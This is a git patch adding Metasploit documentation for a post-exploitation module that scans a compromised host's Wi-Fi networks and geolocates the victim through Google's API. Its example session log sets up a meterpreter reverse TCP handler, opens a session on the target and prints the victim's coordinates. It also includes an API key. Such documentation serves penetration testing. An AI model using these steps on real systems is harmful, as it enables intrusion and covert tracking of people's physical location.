From c5cc2f89a0280dd9e7b255463c819e2ad7d776d5 Mon Sep 17 00:00:00 2001 From: h00die Date: Sun, 1 Oct 2017 19:49:48 -0400 Subject: [PATCH] add docs for wlan_geolocate --- .../post/multi/gather/wlan_geolocate.md | 66 +++++++++++++++++++ 1 file changed, 66 insertions(+) create mode 100644 documentation/modules/post/multi/gather/wlan_geolocate.md diff --git a/documentation/modules/post/multi/gather/wlan_geolocate.md b/documentation/modules/post/multi/gather/wlan_geolocate.md new file mode 100644 index 0000000000..e8a9d33f26 --- /dev/null +++ b/documentation/modules/post/multi/gather/wlan_geolocate.md @@ -0,0 +1,66 @@ +## Creating A Testing Environment + + For this module to work you need a box with a wireless adapter. The following methods are used to gather + wireless information from the host: + + - Windows: `netsh wlan show networks mode=bssid` + - OSX: `/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -s` + - Linux: `iwlist scanning` + - Solaris: `dladm scan-wifi` + - BSD: `dmesg | grep -i wlan | cut -d ':' -f1 | uniq"` + + If `GEOLOCATE` is set to true, Google's [GeoLocation APIs](https://developers.google.com/maps/documentation/geolocation/intro) are utilized. + These APIs require a Google [API key](https://developers.google.com/maps/documentation/geolocation/get-api-key) to use them. The original + methodology used by this module in [#3280](https://github.com/rapid7/metasploit-framework/pull/3280), + which didn't require an API key, was found to no longer work in [#8928](https://github.com/rapid7/metasploit-framework/issues/8928). + +## Verification Steps + + 1. Start msfconsole + 2. Obatin a meterpreter session via whatever method + 3. Do: `use post/multi/gather/wlan_geolocate` + 4. Do: `set session #` + 5. Do: `set apikey [key]` + 5. Do: `run` + +## Options + + **geolocate** + + A boolean on if wireless information should only be gathered, or the Google geolocate API should be used to geo the victim. Defaults to `false` + + **apikey** + + A string containing the Google provided geolocation api key. **REQUIRED** if `geolocate` is set to true. Defaults to empty string + +## Scenarios + +### Windows 10 + + resource (met_rev.rc)> use exploit/multi/handler + resource (met_rev.rc)> set payload windows/meterpreter/reverse_tcp + payload => windows/meterpreter/reverse_tcp + resource (met_rev.rc)> setg lhost 2.2.2.2 + lhost => 2.2.2.2 + resource (met_rev.rc)> set lport 9876 + lport => 9876 + resource (met_rev.rc)> setg verbose true + verbose => true + resource (met_rev.rc)> exploit + [*] Exploit running as background job 0. + [*] Started reverse TCP handler on 2.2.2.2:9876 + [*] Sending stage (179267 bytes) to 1.1.1.1 + [*] Meterpreter session 1 opened (2.2.2.2:9876 -> 1.1.1.1:16111) at 2017-10-01 19:27:15 -0400 + + resource (met_rev.rc)> use post/multi/gather/wlan_geolocate + resource (met_rev.rc)> set geolocate true + geolocate => true + resource (met_rev.rc)> set session 1 + session => 1 + resource (met_rev.rc)> set apikey ANza1yFLhaK3lreck7N3S_GYbEtJE3gGg5dJe12 + apikey => ANza1yFLhaK3lreck7N3S_GYbEtJE3gGg5dJe12 + msf post(wlan_geolocate) > run + [+] Wireless list saved to loot. + [*] Google indicates the device is within 30.0 meters of 30.3861197,-97.7385878. + [*] Google Maps URL: https://maps.google.com/?q=30.3861197,-97.7385878 + [*] Post module execution completed